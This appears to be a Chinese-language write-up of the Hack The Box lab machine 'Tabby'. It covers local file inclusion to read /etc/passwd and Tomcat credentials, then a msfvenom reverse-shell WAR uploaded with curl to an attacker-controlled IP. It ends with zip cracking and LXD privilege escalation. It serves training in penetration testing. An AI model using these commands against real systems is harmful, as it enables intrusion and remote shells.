当前位置: 代码迷 >> 综合 >> Hack the box靶机 Tabby
  详细解决方案

Hack the box靶机 Tabby

热度:95   发布时间:2023-12-03 12:51:36.0

在这里插入图片描述

开放80和8080
查看一下

在这里插入图片描述
在这里插入图片描述

点击news时发生错误
看见?file=
可能有文件包含
先修改/etc/hosts 把10.10.10.194 megahosting.htb加入
在这里插入图片描述
在这里插入图片描述

再次访问
可以成功访问了
接下来测试是否是文件包含漏洞

在这里插入图片描述

访问/etc/passwd
发现用户ash

在这里插入图片描述

8080上市tomcat9
访问/usr/share/tomcat9/etc/tomcat-users.xml

在这里插入图片描述

tomcat登录账号
tomcat:$3cureP4s5w0rd123!

在这里插入图片描述

登录成功
tomcat操作手册

在这里插入图片描述

msfvenom -p java/shell_reverse_tcp LHOST=10.10.16.6 LPORT=4444 -f war -o shell.war  //生成exp
curl --user 'tomcat:$3cureP4s5w0rd123!' --upload-file shell.war "http://10.10.10.194:8080/manager/text/deploy?path=/shell.war"    //上传exp

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

发现一个.zip文件

在这里插入图片描述
在这里插入图片描述

下载后发现需要密码
fcrackzip爆破

在这里插入图片描述

没发现压缩包里有什么信息
到时admin@it可以当作ash的密码
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

wget https://raw.githubusercontent.com/saghul/lxd-alpine-builder/master/build-alpine
chmod +x build-alpine
./build-alpine
python -m SimpleHTTPServer 80wget http://10.10.16.6/alpine-v3.12-x86_64-20200921_0435.tar.gz

在这里插入图片描述

没记录过程
给了链接吧
可以直接去看提权过程
提权方法